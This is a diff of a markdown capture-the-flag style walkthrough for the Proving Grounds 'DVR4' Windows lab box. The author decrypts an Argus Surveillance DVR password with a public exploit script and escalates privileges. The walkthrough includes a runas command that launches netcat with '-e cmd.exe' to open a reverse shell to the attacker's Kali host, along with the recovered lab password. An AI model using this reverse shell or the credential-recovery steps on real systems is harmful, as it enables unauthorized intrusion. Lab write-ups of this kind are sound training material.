Bsal13/Offensive-Security-Proving-Grounds-Boxes/DVR4 (Intermediate) Windows Box.md

 - To copy the Python script to our Kali computer, we type "searchsploit -m windows/local/50130.py".

-#### - Typed "cat 50130.py" and found the following contents:
+- We type "cat 50130.py" and the contents appeared as follows:

 ![](Images/Pasted%20image%2020221009192437.png)

-#### - Ran a privilege escalation script but couldn't find anything interesting
+- We try a privilege escalation script, but nothing seems worth looking into.

-#### - Typed "dir /a" in the C: directory to find any hidden directorys/files and found hidden directory "ProgramData"
+- To locate any hidden files or directories, we type "dir /a" into the C: directory.
+This allowed us to locate the hidden directory ProgramData.

 ![](Images/Pasted%20image%2020221009192857.png)
 #FindHiddenWindowsDirectorys

-#### - Changed to directory "ProgramData" and found the following directories.
-I then navigated into the "PY_Software" directory:
+- We navigate to the "ProgramData" directory and discover the following directory:

 ![](Images/Pasted%20image%2020221009193059.png)

-#### - I then found a "Argus Serveillance DVR" directory and navigated into it:
+- We access the "PY_Software" directory.

+-We locate and navigate to the "Argus Surveillance DVR" directory:

 ![](Images/Pasted%20image%2020221009193752.png)

-#### - I then found the DVRParams (.ini) configuration file:
+- Next, we locate the configuration file DVRParams (.ini):

 ![](Images/Pasted%20image%2020221009194221.png)
 #WindowsProgramConfigurationFile

-#### - I then typed "type DVRParams.ini" to read the contents of the configuration file and found the following "adminstrator" user and hashed or encrypted password "ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8":
+- After that, we enter "type DVRParams.ini" to access the configuration file's contents and discover the hashed or encrypted password "ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8" along with the "administrator" user:

 ![](Images/Pasted%20image%2020221009201025.png)

-#### - Attempted to type "hashid ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8" to identify the hash but received an Uknown hash:
+- When trying to find the hash, we type "hashid ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8" but returned an unknown hash instead:

 ![](Images/Pasted%20image%2020221009201200.png)
 	#IdentifyHashID

-#### - Remembered the "Weak password encryption" exploit/script found earlier.
-Typed "vim 50130.py" and input the encrypted password into the script:
+- We recall the previously discovered "weak password encryption" script/exploit.
+We enter the encrypted password into the script and type "vim 50130.py":

 ![](Images/Pasted%20image%2020221009201411.png)

-#### - Typed "python 50130.py" to run the script and found the mostly decrypted password to be "14WatchD0g".
-Although the script is unable to decode the last string of characters:
+- After entering "python 50130.py" to launch the script, "14WatchD0g" was discovered to be the password that had been largely decoded.
+Even so, the last character string is unintelligible to the script:

 ![](Images/Pasted%20image%2020221009201544.png)

-#### - Reading through the script we find the coder of the script was "too lazy to add special characters":
+- We discover that the programmer was "too lazy to add special characters" after reading the script:

 ![](Images/Pasted%20image%2020221009201710.png)

-## - I input a character one by
-#### - Navigated to the viewer users directory and found the netcat executable was installed:
+- We locate the installed netcat executable by navigating to the viewer users directory:

 ![](Images/Pasted%20image%2020221009202007.png)

-#### - Setup a netcat listener to listen on port 443
+- We configure a netcat listener on port 443.

-#### -As we are going to attempt to login as a different user (Administrator) I googled "how to run a program as a different user in windows command line" :
+- We looked into the syntax needed to utilize the "runas" command in order to run a command as a different user.

 ![](Images/Pasted%20image%2020221009202220.png)

-#### - Per the web page it showed to run the following command example "runas /user:admin "C:\Windows\notepad.exe"
+- The webpage instructs users to execute the command "runas /user:admin "C:\Windows\notepad.exe"."

 ![](Images/Pasted%20image%2020221009202314.png)
 - [ ]
 ## Privilege Escalation vector
 ## Runas command to login with a different user in CMD

+- We type the following command and receive a CMD prompt running as Administrator:

-#### - Typed runas /user:Administrator "C:\Users\viewer\nc.exe -e cmd.exe [Kali IP] 443" and password 14WatchD0g$ (can also type runas /env /profile /user:DVR4\Administrator "C:\Users\viewer\nc.exe -e cmd.exe [Kali IP] 443") and received a cmd promp running as Administrator:
+"runas /env /profile /user:DVR4\Administrator "C:\Users\viewer\nc.exe -e cmd.exe [Kali IP] 443"

+- We are prompted for the administrator's password.

+- We tried every special character after discovering the partial password "14WatchD0g" until it finally worked and we received a CMD prompt as Administrator:

 ![](Images/Pasted%20image%2020221009202519.png)